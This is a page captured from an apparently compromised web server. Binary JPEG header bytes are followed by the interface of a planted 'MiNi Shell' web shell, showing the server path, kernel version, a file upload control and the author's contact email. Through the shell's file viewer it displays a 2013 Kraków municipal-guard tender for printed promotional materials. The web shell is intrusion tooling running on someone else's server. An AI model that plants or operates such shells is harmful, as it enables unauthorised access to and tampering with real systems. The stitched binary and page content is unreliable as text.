JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130528/206790-N-2013.html

<p class="kh_header"><b>Kraków: Drukowanie materiałów służbowych</b><br>
<b>Numer ogłoszenia: 206790 - 2013; data zamieszczenia: 28.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 12 68 82 154, faks 12 68 82 292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Drukowanie materiałów służbowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie materiałów służbowych (kamizelki odblaskowe 
z nadrukiem, naklejki odblaskowe z nadrukiem, długopisy z grawerem, zawieszki odblaskowe 
z nadrukiem i karabińczykiem, ulotki informacyjne, wizytówki w kompletach po 100 szt.) zgodnych ze wzorami używanymi przez Straż Miejską Miasta Krakowa.

Część 1 - kamizelki odblaskowe z nadrukiem -  60 szt.
                   Oznaczenie przedmiotu zamówienia wg CPV 79.81.00.00-5
Opis przedmiotu zamówienia: 
Rozmiary kamizelek 50-55 cm (wzrost 120-134 cm). Kamizelka powinna być wykonana 
z fluorescencyjnego poliestru w kolorze żółtym,  obszyta żółtą lamówką. Kamizelka ma być zakładana przez głowę, przednia i tylna powinna być połączona co najmniej jedną gumką. W dolnej części dwa odblaskowe pasy o szer. 5 cm wykonane ze srebrnej tkaniny zgodnej z normą EN471. Bezpośrednio nad pasami odblaskowymi nadrukowany okrągły znak (STOP)- biały napis 
na czerwonym tle z białą obwódką. W przedniej górnej części emblemat (Straż Miejska Miasta 
Krakowa) (strona lewa)  i logotyp programu (Bezpieczny Kraków) (prawa strona). W dolnej części, po prawej stronie, w miejscu nie zasłoniętym przez pasy odblaskowe powinien być umieszczony 
napis (Dzielnica Siódma Kraków Zwierzyniec) po obu stronach herbu (logo) dzielnicy (zgodnie 
ze wzorem posiadanym przez SMMK). 
Kamizelki muszą posiadać certyfikat bezpieczeństwa produktu umieszczony na metce.
Przy dostawie każda kamizelka musi być oddzielnie zapakowana w przeźroczystą folię. 

Część 2  - naklejki odblaskowe okrągłe z nadrukiem logo SMMK -  7857 szt.
	Oznaczenie przedmiotu zamówienia wg CPV 79.81.00.00-5
Opis przedmiotu zamówienia: 
Naklejki odblaskowe do naklejania na tornistry, plecaki, kurtki, w kształcie koła o średnicy 4,5 cm, mix kolorów jasny - żółty, seledynowy, srebrny z folii pryzmatycznej, osobno 
pakowane  w woreczki ochronne. Nadruk - logo SMMK o wysokości 3 cm (+- 5 mm). 
Przy dostawie naklejki muszą być pakowane w pojemniki/pudełka po 100 szt. 

Część 3  - długopisy z grawerem  - 523 szt.
                Oznaczenie przedmiotu zamówienia wg CPV 79.82.22.00-4
Opis przedmiotu zamówienia: 
Długopisy metalowe o wymiarach (długość: 137 x średnica: 10 mm), w kolorach niebieskim, 
czerwonym, żółtym, zielonym, srebrnym, w ilościach proporcjonalnych, z nadrukiem w kolorze 
białym, w technice graweru laserowego o treści: (Straż Miejska Kraków 986) o wysokości 
od 3 do 4 mm.

Część 4  - zawieszki odblaskowe z nadrukiem i karabińczykiem  - 1036 szt.
                Oznaczenie przedmiotu zamówienia wg CPV 79.81.00.00-5
Opis przedmiotu zamówienia: 
Zawieszki odblaskowe twarde, w kształcie trójkąta równobocznego o boku 5 cm, z karabińczykiem metalowym w kolorze srebrnym, zawieszki w kolorach żółtym, czerwonym, zielonym, 
seledynowym - w ilościach proporcjonalnych, pakowane po 50 szt. w pudełka w jednakowych 
kolorach. Na środku nadruk logo SMMK o wysokości 2,5 cm (+- 5 mm) w kolorze czarnym lub ciemnogranatowym.

Część 5  - ulotki informacyjne  - 1250 szt.
                Oznaczenie przedmiotu zamówienia wg CPV 79.81.00.00-5, 22.14.00.00-3
Opis przedmiotu zamówienia: 
Ulotki na papierze gładkim, białym, błyszczącym, o gramaturze od 40 do 60 g/m2, formatu A6, 
zgodne ze wzorem. Na ulotce wydrukowane kolorowe zdjęcie, zajmujące powierzchnię około 60 
- 70 % powierzchni ulotki. Poniżej nadruk z informacją dla posiadaczy zwierząt, niżej kolorowe 
loga organizatorów akcji i patronów medialnych. Na odwrocie ulotki brak nadruku.

Część 6  - wizytówki w kompletach po 100 szt.  - 36 kpl.
                Oznaczenie przedmiotu zamówienia wg CPV 79.81.00.00-5
Opis przedmiotu zamówienia: 
Wizytówki na papierze białym, gładkim, o gramaturze od 230 do 250 g/m2, formatu 90 x 50 mm, 
z granatowym pasem o wysokości 9 mm z napisem koloru białego (Straż Miejska Miasta Krakowa), odsuniętym od górnej krawędzi o 7 mm, na nim kolorowe logo SMMK z herbem miasta Krakowa, poniżej imię i nazwisko, stanowisko oraz dane kontaktowe (adres, telefony, e-mail). Pakowane 
po 100 szt. dla każdego wzoru..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Jeżeli w okresie 6 miesięcy od udzielenia zamówienia podstawowego wystąpi 
konieczność udzielenia zamówień uzupełniających dotychczasowemu Wykonawcy 
dostaw, stanowiących łącznie nie więcej niż 20% wartości zamówienia podstawowego 
i polegających na powtórzeniu tego samego rodzaju zamówień, to Wykonawca 
zobowiązany jest wykonać to zamówienie, na dodatkowe zamówienie Zamawiającego 
udzielone z wolnej ręki, przy zachowaniu tych samych nośników cenotwórczych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.22.00-4, 22.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu wadium nie obowiązuje.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.
Oprócz oświadczenia, dla oceny warunku wiedzy i doświadczenia 
Wykonawcy, wymagane jest załączenie do oferty wykazu co najmniej trzech 
głównych usług, odpowiadających przedmiotowi zamówienia, w okresie ostatnich trzech lat, wraz z podaniem ich wartości, przedmiotu, daty wykonania oraz 
podmiotów, na rzecz których usługi zostały wykonane. Wykonawca 
zobowiązany jest dołączyć dowód, że usługi zostały wykonane należycie. Wykaz może obejmować aktualnie realizowane usługi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wzory (próbki) oferowanych materiałów służbowych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość i estetyka wykonania - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 314.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2013 godzina 10:00, miejsce: Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 314.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kamizelki odblaskowe z nadrukiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozmiary kamizelek 50-55 cm (wzrost 120-134 cm). Kamizelka powinna być wykonana 
z fluorescencyjnego poliestru w kolorze żółtym,  obszyta żółtą lamówką. Kamizelka ma być zakładana przez głowę, przednia i tylna powinna być połączona co najmniej jedną gumką. W dolnej części dwa odblaskowe pasy o szer. 5 cm wykonane ze srebrnej tkaniny zgodnej z normą EN471. Bezpośrednio nad pasami odblaskowymi nadrukowany okrągły znak (STOP)- biały napis 
na czerwonym tle z białą obwódką. W przedniej górnej części emblemat (Straż Miejska Miasta 
Krakowa) (strona lewa)  i logotyp programu (Bezpieczny Kraków) (prawa strona). W dolnej części, po prawej stronie, w miejscu nie zasłoniętym przez pasy odblaskowe powinien być umieszczony 
napis (Dzielnica Siódma Kraków Zwierzyniec) po obu stronach herbu (logo) dzielnicy (zgodnie 
ze wzorem posiadanym przez SMMK). 
Kamizelki muszą posiadać certyfikat bezpieczeństwa produktu umieszczony na metce.
Przy dostawie każda kamizelka musi być oddzielnie zapakowana w przeźroczystą folię..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość i estetyka wykonania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naklejki odblaskowe z nadrukiem logo SMMK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naklejki odblaskowe do naklejania na tornistry, plecaki, kurtki, w kształcie koła o średnicy 4,5 cm, mix kolorów jasny - żółty, seledynowy, srebrny z folii pryzmatycznej, osobno pakowane  w woreczki ochronne. Nadruk - logo SMMK o wysokości 3 cm (+- 5 mm). 
Przy dostawie naklejki muszą być pakowane w pojemniki/pudełka po 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakośc i estetyka wykonania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Długopisy z grawerem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Długopisy metalowe o wymiarach (długość: 137 x średnica: 10 mm), w kolorach niebieskim, 
czerwonym, żółtym, zielonym, srebrnym, w ilościach proporcjonalnych, z nadrukiem w kolorze 
białym, w technice graweru laserowego o treści: (Straż Miejska Kraków 986) o wysokości od 3 do 4 mm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.22.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość i estetyka wykonania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zawieszki odblaskowe z nadrukiem i karabińczykiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zawieszki odblaskowe twarde, w kształcie trójkąta równobocznego o boku 5 cm, z karabińczykiem metalowym w kolorze srebrnym, zawieszki w kolorach żółtym, czerwonym, zielonym, seledynowym - w ilościach proporcjonalnych, pakowane po 50 szt. w pudełka w jednakowych kolorach. Na środku nadruk logo SMMK o wysokości 2,5 cm (+- 5 mm) w kolorze czarnym lub ciemnogranatowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość i estetyka wykonania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ulotki informacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ulotki na papierze gładkim, białym, błyszczącym, o gramaturze od 40 do 60 g/m2, formatu A6, zgodne ze wzorem. Na ulotce wydrukowane kolorowe zdjęcie, zajmujące powierzchnię około 60 - 70 % powierzchni ulotki. Poniżej nadruk z informacją dla posiadaczy zwierząt, niżej kolorowe loga organizatorów akcji i patronów medialnych. Na odwrocie ulotki brak nadruku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 22.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość i estetyka wykonania - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wizytówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wizytówki na papierze białym, gładkim, o gramaturze od 230 do 250 g/m2, formatu 90 x 50 mm, z granatowym pasem o wysokości 9 mm z napisem koloru białego (Straż Miejska Miasta Krakowa), odsuniętym od górnej krawędzi o 7 mm, na nim kolorowe logo SMMK z herbem miasta Krakowa, poniżej imię i nazwisko, stanowisko oraz dane kontaktowe (adres, telefony, e-mail). Pakowane po 100 szt. dla każdego wzoru. 36 kompletów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość i estetyka wykonania - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com